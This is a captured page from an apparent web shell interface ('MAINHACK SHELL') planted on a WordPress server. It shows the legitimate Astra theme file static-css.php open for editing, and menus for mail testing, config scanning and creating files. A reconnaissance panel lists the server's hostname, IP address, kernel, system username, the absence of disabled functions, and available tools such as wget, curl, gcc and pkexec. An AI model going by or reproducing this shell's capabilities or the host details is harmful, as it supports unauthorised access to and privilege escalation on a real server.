[
MAINHACK SHELL
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: static-css.php
<?php /** * Scroll to Top - Static CSS * * @package Astra * * @since 4.0.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } add_filter( 'astra_dynamic_theme_css', 'astra_scroll_to_top_static_css', 11 ); /** * Scroll to Top - Static CSS * * @param string $dynamic_css Astra Dynamic CSS. * @return String Generated dynamic CSS for Scroll to Top. * * @since 4.0.0 */ function astra_scroll_to_top_static_css( $dynamic_css ) { if ( true !== astra_get_option( 'scroll-to-top-enable', true ) ) { return $dynamic_css; } $is_site_rtl = is_rtl() ? true : false; $ltr_left = $is_site_rtl ? 'right' : 'left'; $ltr_right = $is_site_rtl ? 'left' : 'right'; $dynamic_css .= ' #ast-scroll-top { display: none; position: fixed; text-align: center; cursor: pointer; z-index: 99; width: 2.1em; height: 2.1em; line-height: 2.1; color: #ffffff; border-radius: 2px; content: ""; outline: inherit; } @media (min-width: 769px) { #ast-scroll-top { content: "769"; } } #ast-scroll-top .ast-icon.icon-arrow svg { margin-' . esc_attr( $ltr_left ) . ': 0px; vertical-align: middle; transform: translate(0, -20%) rotate(180deg); width: 1.6em; } .ast-scroll-to-top-right { ' . esc_attr( $ltr_right ) . ': 30px; bottom: 30px; } .ast-scroll-to-top-left { ' . esc_attr( $ltr_left ) . ': 30px; bottom: 30px; } '; return $dynamic_css; }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server.isorus.org
Server IP: 159.223.142.74
PHP Version: 7.4.33
Server Software: Apache
System: Linux server.isorus.org 4.18.0-477.27.2.el8_8.x86_64 #1 SMP Fri Sep 29 08:21:01 EDT 2023 x86_64
HDD Total: 319.99 GB
HDD Free: 215.79 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
Off
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: inceptionblue
User ID (UID): 1042
Group ID (GID): 1043
Script Owner UID:
Current Dir Owner: 1042